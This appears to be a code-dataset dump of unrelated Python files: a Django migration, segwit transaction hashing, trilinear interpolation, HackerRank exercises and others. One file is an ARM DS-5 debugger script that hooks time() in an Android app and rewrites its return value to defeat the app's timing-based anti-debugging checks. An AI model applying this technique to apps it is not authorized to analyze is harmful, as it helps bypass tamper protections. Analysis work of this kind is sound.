] | 10 | 2021-01-10T09:39:16.000Z | 2022-02-05T06:40:47.000Z | src/person/migrations/0004_actors_moved.py | Little-Pogchamp-Team/kinopoisk_on_django | 06e1b5ee14c7e77dd5b69140732461a02bf44566 | [
"MIT"
] | null | null | null | src/person/migrations/0004_actors_moved.py | Little-Pogchamp-Team/kinopoisk_on_django | 06e1b5ee14c7e77dd5b69140732461a02bf44566 | [
"MIT"
] | 1 | 2021-01-11T17:04:06.000Z | 2021-01-11T17:04:06.000Z | # Generated by Django 3.1.5 on 2021-03-22 17:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movies', '0010_actors_moved'),
('person', '0003_refactoring_movie_person_m2m_rels'),
]
operations = [
migrations.AddField(
model_name='person',
name='movies',
field=models.ManyToManyField(related_name='persons', through='person.PersonRole', to='movies.Movie'),
),
migrations.AddField(
model_name='personrole',
name='role_name',
field=models.CharField(max_length=100, null=True),
),
]
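# Not part of this migration: a hedged sketch of what the person.PersonRole
# through model presumably looks like once the migration is applied. Only
# role_name is taken from the migration itself; the link field names are assumptions.
from django.db import models

class PersonRole(models.Model):
    person = models.ForeignKey('person.Person', on_delete=models.CASCADE)   # assumed
    movie = models.ForeignKey('movies.Movie', on_delete=models.CASCADE)     # assumed
    role_name = models.CharField(max_length=100, null=True)                 # added by this migration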
| 26.88 | 113 | 0.605655 | 70 | 672 | 5.642857 | 0.685714 | 0.091139 | 0.116456 | 0.136709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05499 | 0.269345 | 672 | 24 | 114 | 28 | 0.749491 | 0.066964 | 0 | 0.222222 | 1 | 0 | 0.2144 | 0.0608 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d580ac0342437490dbebbfefc2c13b2463ec74 | 4,265 | py | Python | ds5-scripts/aosp_8_1/arm/time.py | rewhy/happer | 3b48894e2d91f150f1aee0ce75291b9ca2a29bbe | [
"Apache-2.0"
] | 32 | 2021-04-08T05:39:51.000Z | 2022-03-31T03:49:35.000Z | ds5-scripts/aosp_8_1/arm/time.py | rewhy/happer | 3b48894e2d91f150f1aee0ce75291b9ca2a29bbe | [
"Apache-2.0"
] | 2 | 2021-04-14T08:31:30.000Z | 2021-08-29T19:12:09.000Z | ds5-scripts/aosp_8_1/arm/time.py | rewhy/happer | 3b48894e2d91f150f1aee0ce75291b9ca2a29bbe | [
"Apache-2.0"
] | 3 | 2021-06-08T08:52:56.000Z | 2021-06-23T17:28:51.000Z | # time.py
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
# obtain current execution state
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
def cleanup():
if mmu.page_table is not None:
del mmu.page_table
gc.collect()
def start_prolog():
# disable the time breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_time:
brk_object.disable()
def end_prolog():
# enable the time breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_time:
brk_object.enable()
TIME_INTERVAL = 1000000L # usec
def time():
# -- HEAD -- #
start_prolog()
# -- BODY -- #
pid = int(execution_state.getVariableService().readValue("$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
# only focus on the invocation from app -> gettimeofday
lr = int(execution_state.getRegisterService().getValue("LR")) & 0xffffffff
if not config.in_app_range(lr):
# -- TAIL -- #
end_prolog()
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
# get timeval pointer
time_t_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
if config.debug:
print "[time] pid = %#x, lr = %0#10x, time_t_ptr = %0#10x" % (pid, lr, time_t_ptr)
config.log_print("[time] pid = %#x, lr = %0#10x, time_t_ptr = %0#10x" % (pid, lr, time_t_ptr))
brk_time = config.libc_base + config.time_end - config.libc_file_offset + config.libc_memory_offset
execution_state.getExecutionService().resumeTo(brk_time)
try:
execution_state.getExecutionService().waitForStop(60000) # wait for 60s
except DebugException:
raise RuntimeError("wtf !!!")
# obtain the obtained value
tv_sec = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
tv_usec = 0x0
if config.debug:
print "[time] (origin) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec)
# config.log_print("[time] (origin) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec))
# anti time checking
tv_sec_old, tv_usec_old = config.load_time_info()
if tv_sec <= tv_sec_old:
tv_sec = tv_sec_old + 0x1
if tv_sec < tv_sec_old:
# TODO: should raise an exception, but we just ignore it at this time
assert False
else:
if tv_sec_old != 0:
time_interval = (tv_sec * 1000000L) - (tv_sec_old * 1000000L)
if time_interval > TIME_INTERVAL:
tv_sec_new = int(((tv_sec_old * 1000000L) + TIME_INTERVAL) / 1000000L)
tv_usec_new = int(((tv_sec_old * 1000000L) + TIME_INTERVAL) - (tv_sec_new * 1000000L))
assert tv_usec_new == 0
# verification
time_old = tv_sec_old * 1000000L + tv_usec_old
time_new = tv_sec_new * 1000000L + tv_usec_new
assert time_new == (time_old + TIME_INTERVAL)
config.save_time_info(tv_sec_new, tv_usec_new)
execution_state.getRegisterService().setValue("R0", tv_sec_new)
# obtain the adjusted value
tv_sec = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
tv_usec = 0x0
if config.debug:
print "[time] (adjust) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec)
# config.log_print("[time] (adjust) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec))
else:
config.save_time_info(tv_sec, tv_usec)
elif tv_sec_old == 0 and tv_usec_old == 0:
config.save_time_info(tv_sec, tv_usec)
else:
raise RuntimeError("invalid timeval valus !!!")
# -- TAIL -- #
end_prolog()
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
if __name__ == '__main__':
time()
sys.exit()
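# Not part of the DS-5 script: the anti-time-checking block above boils down to
# a clamping rule; a standalone sketch of that rule with illustrative numbers.
USEC_PER_SEC = 1000000

def clamp_time(tv_sec_old, tv_usec_old, tv_sec, interval_usec=USEC_PER_SEC):
    # the reported clock must keep moving forward, but never by more than interval_usec
    old_usec = tv_sec_old * USEC_PER_SEC + tv_usec_old
    if tv_sec <= tv_sec_old:
        new_usec = (tv_sec_old + 1) * USEC_PER_SEC            # force at least +1 s
    else:
        new_usec = min(tv_sec * USEC_PER_SEC, old_usec + interval_usec)
    return new_usec // USEC_PER_SEC, new_usec % USEC_PER_SEC

# e.g. a 5 s jump between two time() calls is reported as a 1 s jump:
# clamp_time(100, 0, 105) == (101, 0)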
| 32.557252 | 126 | 0.687222 | 584 | 4,265 | 4.75 | 0.246575 | 0.055876 | 0.028839 | 0.023792 | 0.537131 | 0.50036 | 0.46323 | 0.443403 | 0.397981 | 0.397981 | 0 | 0.039409 | 0.190856 | 4,265 | 130 | 127 | 32.807692 | 0.764416 | 0.161547 | 0 | 0.317073 | 0 | 0.04878 | 0.093732 | 0.014646 | 0 | 0 | 0.02314 | 0.007692 | 0.036585 | 0 | null | null | 0 | 0.097561 | null | null | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d8495b0fdeb7179e8f4818df4634dea3eb06dd | 312 | py | Python | 0118.Pascal's_Triangle/solution.py | WZMJ/Algorithms | 07f648541d38e24df38bda469665c12df6a50637 | [
"MIT"
] | 5 | 2020-05-23T02:18:26.000Z | 2021-07-05T05:36:01.000Z | 0118.Pascal's_Triangle/solution.py | WZMJ/Algorithms | 07f648541d38e24df38bda469665c12df6a50637 | [
"MIT"
] | 1 | 2020-06-10T07:17:24.000Z | 2020-07-20T02:21:24.000Z | 0118.Pascal's_Triangle/solution.py | WZMJ/Algorithms | 07f648541d38e24df38bda469665c12df6a50637 | [
"MIT"
] | 1 | 2019-04-23T13:01:50.000Z | 2019-04-23T13:01:50.000Z | class Solution:
def generate(self, num_rows):
if num_rows == 0:
return []
ans = [1]
result = [ans]
for _ in range(num_rows - 1):
ans = [1] + [ans[i] + ans[i + 1] for i in range(len(ans[:-1]))] + [1]
result.append(ans)
return result
| 28.363636 | 81 | 0.464744 | 42 | 312 | 3.357143 | 0.452381 | 0.148936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036649 | 0.387821 | 312 | 10 | 82 | 31.2 | 0.701571 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21dc1958ff8c27f13a30ce7881d7c3c522568e75 | 4,738 | py | Python | bin/ADFRsuite/CCSBpckgs/Volume/Operators/trilinterp.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/Volume/Operators/trilinterp.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/Volume/Operators/trilinterp.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | 1 | 2021-11-04T21:48:14.000Z | 2021-11-04T21:48:14.000Z | ################################################################################
##
## This library is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation; either
## version 2.1 of the License, or (at your option) any later version.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this library; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
##
## (C) Copyrights Dr. Michel F. Sanner and TSRI 2016
##
################################################################################
def trilinterp(pts, map, inv_spacing, origin, output_8pts=0):
"""returns a list of values looked up in a 3D grid (map) at
    3D locations (pts).
INPUT:
pts 3D coordinates of points to lookup
map, grid data (has to be a Numeric array)
inv_spacing, 1. / grid spacing (3-tuple)
origin minimum coordinates in x, y and z
OUTPUT:
values values at points
"""
##
##
## Authors: Garrett M. Morris, TSRI, Accelerated C version 2.2 (C++ code)
## David Goodsell, UCLA, Original FORTRAN version 1.0 (C code)
## Michel Sanner (python port)
## Date: 10/06/94, march 26 03
values = []
invx, invy, invz = inv_spacing
xlo, ylo, zlo = origin
maxx = map.shape[0] - 1
maxy = map.shape[1] - 1
maxz = map.shape[2] - 1
for x,y,z in pts:
u = (x-xlo) * invx
u0 = max(0, int(u)) # clamp at lower bound of volume
u0 = min(maxx, u0)
u1 = min(maxx, u0 + 1) # clamp at upper bounds of volume
u1 = max(0, u1)
if u0>=maxx: # outside on X+ axis
p0u = 1.0
p1u = 0.0
elif u0<=0: # outside on X- axis
p0u = 0.0
p1u = 1.0
else:
p0u = u - u0
p1u = 1. - p0u
v = (y-ylo) * invy
v0 = max(0, int(v)) # clamp at lower bound of volume
v0 = min(maxy, v0)
v1 = min(maxy, v0 + 1) # clamp at upper bounds of volume
v1 = max(0, v1)
if v0>=maxy: # outside on Y+ axis
p0v = 1.0
p1v = 0.0
elif v0<=0: # outside on Y- axis
p0v = 0.0
p1v = 1.0
else:
p0v = v - v0
p1v = 1. - p0v
w = (z-zlo) * invz
w0 = max(0, int(w)) # clamp at lower bound of volume
w0 = min(maxz, w0)
w1 = min(maxz, w0 + 1) # clamp at upper bounds of volume
w1 = max(0, w1)
if w0>=maxz: # outside on Z+ axis
p0w = 1.0
p1w = 0.0
elif w0<=0: # outside on Z- axis
p0w = 0.0
p1w = 1.0
else:
p0w = w - w0
p1w = 1. - p0w
m = 0.0
if output_8pts:
print '0:', m," + p1u=", p1u, "*p1v=", p1v, "*p1w=", p1w, "*map[ ", u0, "][", v0,"][", w0,"]"
m = m + p1u * p1v * p1w * map[ u0 ][ v0 ][ w0 ]
if output_8pts:
print '1:', m," + p1u=", p1u, " p1v=", p1v, " p0w=", p0w, " map[ ", u0, "][", v0,"][", w1,"]"
m = m + p1u * p1v * p0w * map[ u0 ][ v0 ][ w1 ]
if output_8pts:
print '2:', m," + p1u=", p1u, " p0v=", p0v, " plw=", p1w, " map[ ", u0, "][", v1,"][", w0,"]"
m = m + p1u * p0v * p1w * map[ u0 ][ v1 ][ w0 ]
if output_8pts:
print '3:', m," + p1u=", p1u, " p0v=", p0v, " p0w=", p0w, " map[ ", u0, "][", v1,"][", w1,"]"
m = m + p1u * p0v * p0w * map[ u0 ][ v1 ][ w1 ]
if output_8pts:
print '4:', m," + p0u=", p0u, " p1v=", p1v, " p1w=", p1w, " map[ ", u1, "][", v0,"][", w0,"]"
m = m + p0u * p1v * p1w * map[ u1 ][ v0 ][ w0 ]
if output_8pts:
print '5:', m," + p0u=", p0u, " p1v=", p1v, " p0w=", p0w, " map[ ", u1, "][", v0,"][", w1,"]"
m = m + p0u * p1v * p0w * map[ u1 ][ v0 ][ w1 ]
if output_8pts:
print '6:', m," + p0u=", p0u, " p0v=", p0v, " p1w=", p1w, " map[ ", u1, "][", v1,"][", w0,"]"
m = m + p0u * p0v * p1w * map[ u1 ][ v1 ][ w0 ]
if output_8pts:
print '7:', m," + p0u=", p0u, " p0v=", p0v, " p0w=", p0w, " map[ ", u1, "][", v1,"][", w1,"]"
m = m + p0u * p0v * p0w * map[ u1 ][ v1 ][ w1 ]
if output_8pts:
print 'end: m=', m
values.append(m)
return values
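# Not part of the module: a minimal usage sketch of trilinterp(), assuming a
# small NumPy array as the map (all values below are illustrative).
import numpy

grid = numpy.zeros((3, 3, 3), 'f')
grid[1][1][1] = 1.0                        # one non-zero grid node at index (1, 1, 1)
spacing = (0.5, 0.5, 0.5)                  # grid spacing along x, y, z
inv_spacing = (1.0 / spacing[0], 1.0 / spacing[1], 1.0 / spacing[2])
origin = (0.0, 0.0, 0.0)                   # world coordinates of grid node (0, 0, 0)
# the node itself interpolates to 1.0; a point halfway to a neighbour gives 0.5
values = trilinterp([(0.5, 0.5, 0.5), (0.5, 0.5, 0.75)], grid, inv_spacing, origin)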
| 37.904 | 105 | 0.47003 | 671 | 4,738 | 3.299553 | 0.275708 | 0.045167 | 0.04878 | 0.069106 | 0.36495 | 0.191509 | 0.067299 | 0 | 0 | 0 | 0 | 0.087068 | 0.34065 | 4,738 | 124 | 106 | 38.209677 | 0.621639 | 0.265935 | 0 | 0.151899 | 0 | 0 | 0.084618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.113924 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21df81c4df3e4f5c8e3d15ec62909fed82741b3f | 6,633 | py | Python | python/coffer/coins/impl/_segwittx.py | Steve132/wallet_standard | 09c909b24dc17cf6a0a433644d8f1912e886ab1c | [
"MIT"
] | null | null | null | python/coffer/coins/impl/_segwittx.py | Steve132/wallet_standard | 09c909b24dc17cf6a0a433644d8f1912e886ab1c | [
"MIT"
] | null | null | null | python/coffer/coins/impl/_segwittx.py | Steve132/wallet_standard | 09c909b24dc17cf6a0a433644d8f1912e886ab1c | [
"MIT"
] | null | null | null | from _satoshitx import *
import struct
#https://bitcoincore.org/en/segwit_wallet_dev/
class SWitnessTransaction(STransaction):
	def __init__(self,version,flag,ins,outs,witness,locktime):
super(SWitnessTransaction,self).__init__(version,ins,outs,locktime)
self.flag=flag
self.witness=witness
def serialize(self):
txo=self
#if(not isinstance(txo,SWitnessTransaction) and isinstance(txo,STransaction)):
# return STransaction._sc_serialize(txo)
out=bytearray()
out+=struct.pack('<L',txo.version)
out+=b'\x00'
out+=struct.pack('B',txo.flag)
out+=SVarInt(len(txo.ins)).serialize()
for inv in txo.ins:
out+=inv.serialize()
out+=SVarInt(len(txo.outs)).serialize()
for ot in txo.outs:
out+=ot.serialize()
if(len(txo.witness) != len(txo.ins)):
raise Exception("Witness data not the same length as number of inputs")
for wit in txo.witness: #load witness data
out+=SVarInt(len(wit)).serialize()
for wititem in wit:
out+=SVarInt(len(wititem)).serialize()
out+=wititem #TODO: .serialize()
out+=struct.pack('<L',txo.locktime)
return out
@staticmethod
def _sc_deserialize(sio):
version=struct.unpack('<L',sio.read(4))[0]
num_ins=SVarInt._sc_deserialize(sio)
if(num_ins!=0): #this is not a witness transaction
return STransaction._sc_deserialize(StringIO(sio.getvalue()))
flag=ord(sio.read(1))
num_ins=SVarInt._sc_deserialize(sio)
ins=[SInput._sc_deserialize(sio) for k in range(num_ins)]
num_outs=SVarInt._sc_deserialize(sio)
outs=[SOutput._sc_deserialize(sio) for k in range(num_outs)]
witness=[]
for _ in range(num_ins):
num_wititems=SVarInt._sc_deserialize(sio)
wititems=[]
for _ in range(num_wititems):
witsize=SVarInt._sc_deserialize(sio)
				wititems.append(sio.read(witsize))
witness.append(wititems)
locktime=struct.unpack('<L',sio.read(4))[0]
return SWitnessTransaction(version,flag,ins,outs,witness,locktime)
#TODO: from tx that calls coin.signature
def txid_hash(self):
return dblsha256(super(SWitnessTransaction,self).serialize())
def wtxid_hash(self):
return dblsha256(self.serialize())
def segwit_get_prevouthash(stxo):
out=bytearray()
for inp in stxo.ins:
out+=inp.outpoint.serialize()
return dblsha256(out)
"""template <class T>
uint256 GetPrevoutHash(const T& txTo)
{
CHashWriter ss(SER_GETHASH, 0);
for (const auto& txin : txTo.vin) {
ss << txin.prevout;
}
return ss.GetHash();
}"""
def segwit_get_sequencehash(stxo):
out=bytearray()
for inp in stxo.ins:
out+=struct.pack('<L',inp.sequence)
return dblsha256(out)
"""template <class T>
uint256 GetSequenceHash(const T& txTo)
{
CHashWriter ss(SER_GETHASH, 0);
for (const auto& txin : txTo.vin) {
ss << txin.nSequence;
}
return ss.GetHash();
}"""
def segwit_get_outputshash(stxo):
out=bytearray()
for outp in stxo.outs:
out+=outp.serialize()
return dblsha256(out)
"""template <class T>
uint256 GetOutputsHash(const T& txTo)
{
CHashWriter ss(SER_GETHASH, 0);
for (const auto& txout : txTo.vout) {
ss << txout;
}
return ss.GetHash();
}
"""
#TODO: segwit needs the right thing provided in script (redeemscript for p2sh or witness script or scriptPubKey for p2pkh)
#https://bitcoin.stackexchange.com/questions/57994/what-is-scriptcode
def segwit_preimage(stxo,script,input_index,nhashtype,amount=None):
hashPrevouts=b'\x00'*32
hashSequence=b'\x00'*32
hashOutputs=b'\x00'*32
nhashtype=int(nhashtype)
sho=SigHashOptions(nhashtype)
"""if (sigversion == SigVersion::WITNESS_V0) {
uint256 hashPrevouts;
uint256 hashSequence;
uint256 hashOutputs;
const bool cacheready = cache && cache->ready;
if (!(nHashType & SIGHASH_ANYONECANPAY)) {
hashPrevouts = cacheready ? cache->hashPrevouts : GetPrevoutHash(txTo);
}
if (!(nHashType & SIGHASH_ANYONECANPAY) && (nHashType & 0x1f) != SIGHASH_SINGLE && (nHashType & 0x1f) != SIGHASH_NONE) {
hashSequence = cacheready ? cache->hashSequence : GetSequenceHash(txTo);
}
if ((nHashType & 0x1f) != SIGHASH_SINGLE && (nHashType & 0x1f) != SIGHASH_NONE) {
hashOutputs = cacheready ? cache->hashOutputs : GetOutputsHash(txTo);
} else if ((nHashType & 0x1f) == SIGHASH_SINGLE && nIn < txTo.vout.size()) {
CHashWriter ss(SER_GETHASH, 0);
ss << txTo.vout[nIn];
hashOutputs = ss.GetHash();
}"""
if(not sho.anyonecanpay):
hashPrevouts=segwit_get_prevouthash(stxo)
if(not sho.anyonecanpay and sho.mode != SIGHASH_NONE and sho.mode != SIGHASH_SINGLE):
hashSequence=segwit_get_sequencehash(stxo)
if(sho.mode != SIGHASH_SINGLE and sho.mode != SIGHASH_NONE):
hashOutputs=segwit_get_outputshash(stxo)
elif(sho.mode == SIGHASH_SINGLE and input_index < len(stxo.ins)):
hashOutputs=dblsha256(stxo.outs[input_index].serialize())
"""
CHashWriter ss(SER_GETHASH, 0);
// Version
ss << txTo.nVersion;
// Input prevouts/nSequence (none/all, depending on flags)
ss << hashPrevouts;
ss << hashSequence;
// The input being signed (replacing the scriptSig with scriptCode + amount)
// The prevout may already be contained in hashPrevout, and the nSequence
// may already be contain in hashSequence.
ss << txTo.vin[nIn].prevout;
ss << scriptCode;
ss << amount;
ss << txTo.vin[nIn].nSequence;
// Outputs (none/one/all, depending on flags)
ss << hashOutputs;
// Locktime
ss << txTo.nLockTime;
// Sighash type
ss << nHashType;
return ss.GetHash();"""
out=bytearray()
out+=struct.pack('<L',stxo.version)
out+=hashPrevouts
out+=hashSequence
out+=stxo.ins[input_index].outpoint.serialize()
out+=SVarInt(len(script)).serialize()
out+=script
if(amount is None):
a=stxo.ins[input_index].prevout.value
else:
a=int(amount)
out+=struct.pack('<Q',a)
out+=struct.pack('<L',stxo.ins[input_index].sequence)
	out+=hashOutputs
out+=struct.pack('<L',stxo.locktime)
out+=struct.pack('<L',sho.nhashtype)
return out
def segwit_sighash(stxo,input_index,nhashtype,script=None,amount=None):
if(script is None):
#if(p2pkh)USE for
script=stxo.ins[input_index].prevout.scriptPubKey #TODO: is this correct? script seems to be the redeemScript for p2sh and other stuff YEAH use for p2sh when redeemScript includes CHECKSIG
#if(p2sh)
#script=stxo.ins[input_index].scriptSig[0] #redeemscript from scriptSig of input gives pubkey o
preimage=segwit_preimage(stxo,script,input_index,nhashtype,amount)
return dblsha256(preimage)
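# SigHashOptions comes from _satoshitx and is not shown here; a hedged sketch of
# the flag decoding it presumably performs, using the standard Bitcoin sighash
# constants (the real class may differ).
SIGHASH_ALL = 0x01
SIGHASH_NONE = 0x02
SIGHASH_SINGLE = 0x03
SIGHASH_ANYONECANPAY = 0x80

class SigHashOptionsSketch(object):
    def __init__(self, nhashtype):
        self.nhashtype = nhashtype
        self.anyonecanpay = bool(nhashtype & SIGHASH_ANYONECANPAY)
        self.mode = nhashtype & 0x1f   # ALL / NONE / SINGLE selector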
| 30.013575 | 192 | 0.692748 | 863 | 6,633 | 5.223638 | 0.23175 | 0.022183 | 0.025954 | 0.021739 | 0.281943 | 0.201198 | 0.150177 | 0.131766 | 0.053239 | 0.038154 | 0 | 0.015859 | 0.172923 | 6,633 | 220 | 193 | 30.15 | 0.805869 | 0.108096 | 0 | 0.134615 | 0 | 0 | 0.024626 | 0 | 0 | 0 | 0 | 0.013636 | 0 | 1 | 0.096154 | false | 0 | 0.019231 | 0.019231 | 0.221154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21e7aa187114df23f75c99353a77c5e6edd5021a | 1,067 | py | Python | CoTeTo/CoTeTo/import_file.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 3 | 2016-05-30T15:12:16.000Z | 2022-03-22T08:11:13.000Z | CoTeTo/CoTeTo/import_file.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 21 | 2016-06-13T11:33:45.000Z | 2017-05-23T09:46:52.000Z | CoTeTo/CoTeTo/import_file.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
if sys.version_info >= (3, 3):
import importlib
def import_file(module_path='', module=''):
importlib.invalidate_caches()
if module in sys.modules:
del sys.modules[module]
sys.path.insert(0, module_path)
loader = importlib.find_loader(module)
del sys.path[0]
m = loader.load_module(module)
return m
elif sys.version_info >= (2, 7):
def import_file(module_path='', module=''):
if module in sys.modules:
del sys.modules[module]
sys.path.insert(0, module_path)
m = __import__(module)
del sys.path[0]
return m
else:
raise NotImplementedError('This modules functions are not implemented for python <2.7')
if __name__ == '__main__':
# test this module with path and module name as arguments
# will print modules namespace (without __builtins__)
import pprint
p, n = sys.argv[1:]
m = import_file(p, n)
d = m.__dict__
del d['__builtins__']
pprint.pprint(d)
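# Not part of this module (which targets 2.7/3.3): on Python 3.5+ the same
# by-path import is usually done through importlib.util, roughly like this.
import importlib.util
import os

def import_file_modern(module_path, module):
    # build a spec straight from the file, execute it, and return the module object
    spec = importlib.util.spec_from_file_location(module, os.path.join(module_path, module + '.py'))
    m = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(m)
    return m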
| 23.711111 | 91 | 0.622306 | 143 | 1,067 | 4.391608 | 0.412587 | 0.063694 | 0.044586 | 0.06051 | 0.347134 | 0.292994 | 0.200637 | 0.200637 | 0.200637 | 0.200637 | 0 | 0.015424 | 0.270853 | 1,067 | 44 | 92 | 24.25 | 0.791774 | 0.1209 | 0 | 0.413793 | 0 | 0 | 0.083422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.310345 | 0 | 0.448276 | 0.068966 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21f110499fa4d164d3ecef0734601aa0553b4aba | 24,849 | py | Python | Homework1.py | nicolac1999/Homework-ADM | 3ab9f4afaa7fce4a1ffc38a45dbd3a199dba3737 | [
"MIT"
] | null | null | null | Homework1.py | nicolac1999/Homework-ADM | 3ab9f4afaa7fce4a1ffc38a45dbd3a199dba3737 | [
"MIT"
] | null | null | null | Homework1.py | nicolac1999/Homework-ADM | 3ab9f4afaa7fce4a1ffc38a45dbd3a199dba3737 | [
"MIT"
] | null | null | null | #Exercises of the Problem 1 (77/91)
#Say "Hello, World!" With Python
print ("Hello, World!")
#Python If-Else
import math
import os
import random
import re
import sys
if __name__ == '__main__':
n = int(raw_input().strip())
if n%2==1:
print("Weird")
else:
if n>2 and n<5 :
print("Not Weird")
if n>=6 and n<=20:
print("Weird")
if n>20 :
print ("Not Weird")
#Arithmetic Operators
if __name__ == '__main__':
a = int(raw_input())
b = int(raw_input())
print(a+b)
print(a-b)
print(a*b)
#Python: Division
from __future__ import division
if __name__ == '__main__':
a = int(raw_input())
b = int(raw_input())
print(a//b)
print(a/b)
#Loops
if __name__ == '__main__':
n = int(raw_input())
for i in range (0,n):
print(i*i)
#Write a function
def is_leap(year):
leap=False
if year%4==0:
leap= True
if year%100 == 0:
leap=False
if year%400==0:
leap= True
return leap
year = int(raw_input())
print is_leap(year)
#Print Function
from __future__ import print_function
if __name__ == '__main__':
n = int(raw_input())
a=''
for i in range(1,n+1):
a+=str(i)
print(a)
#List Comprehensions
if __name__ == '__main__':
x = int(raw_input())
y = int(raw_input())
z = int(raw_input())
n = int(raw_input())
l=[[i,j,k] for i in range(0,x+1) for j in range(0,y+1) for k in range(0,z+1)]
s=[l[i] for i in range(0,len(l)) if sum(l[i])!=n]
print s
#Find the Runner-Up Score!
if __name__ == '__main__':
n = int(raw_input())
arr = map(int, raw_input().split())
arr2=[arr[i] for i in range(0,len(arr)) if arr[i]!=max(arr)]
print max(arr2)
#Nested Lists
if __name__ == '__main__':
l=[]
punteggi=[]
for _ in range(int(raw_input())):
name = raw_input()
score = float(raw_input())
l=l+[[name,score]]
punteggi+=[score]
punteggi2=[punteggi[i] for i in range(0,len(punteggi)) if punteggi[i]!=min(punteggi)]
minimo=min(punteggi2)
nomi=[l[i][0] for i in range (0,len(l)) if l[i][1]==minimo]
nomi.sort()
for n in nomi:
print (n)
#Finding the percentage
if __name__ == '__main__':
n = int(raw_input())
student_marks = {}
for _ in range(n):
line = raw_input().split()
name, scores = line[0], line[1:]
scores = map(float, scores)
student_marks[name] = scores
query_name = raw_input()
punteggio=student_marks[query_name]
print "%.2f"%(sum(punteggio)/len(punteggio))
#Lists
if __name__ == '__main__':
b=[]
N = int(input())
for _ in range(N):
a=input().split()
if a[0]=="insert":
